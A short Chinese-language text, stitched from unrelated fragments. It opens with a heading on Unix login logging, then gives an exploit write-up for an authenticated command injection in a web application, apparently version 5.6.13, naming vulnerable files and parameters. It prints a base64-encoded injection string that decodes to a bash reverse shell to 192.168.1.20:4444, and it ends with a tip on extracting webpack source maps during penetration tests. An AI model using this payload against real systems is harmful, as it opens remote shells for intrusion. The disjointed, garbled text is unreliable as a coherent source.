Unix系统记录用户登录及操作日志配置——引言
统一Unix系统登录日志、操作命令日志,可以作为系统日志的有效补充
登陆后的,比较鸡肋。4月份发现的,一直放着,后来看官网更新了,直接发出来吧。另外官方还有一个明显的sql注入没修复。不过也是登陆后,感兴趣的可以去看一下。
简要信息版本: 5.6.13(5.6.11版本也存在问题,只需要把最后文件名字中的 - 去掉)
条件:登陆后
漏洞文件相关路径:/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php
漏洞参数:step、start、end
python3
requests库,使用pip3安装即可。python3 -m pip install requests
另外,如果需要执行自己的命令,需要修改commond变量就可以了,这里也懒得改了。脚本中的命令"1|(echo+\"YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMjAvNDQ0NCAwPiYx\"|base64+-d+|sh+-i);#"
其实就是执行的bash -i >& /dev/tcp/192.168.1.20/4444 0>&1
现在许多网站都使用webpack对网站打包,许多前端框架也默认配置好webpack。这会在渗透测试或挖洞过程中带来一些麻烦。这让我们极其痛苦。但是开发者忽视起潜在风险,在线上环境使用了开发环境的配置,或者配置了sourcemap允许在生产环境中使用。这使得我们有了机会。
在实际渗透过程中,许多网站还是存在这种情况。通常一般是配置了devtool: 'source-map' 。
我们可以在js的文件名后面加上.map,如果在这种该文件,我们则可以通过工具解压缩webpack。
或者当我们一般看到类似这样的代码时,也基本可以对其进行解压缩。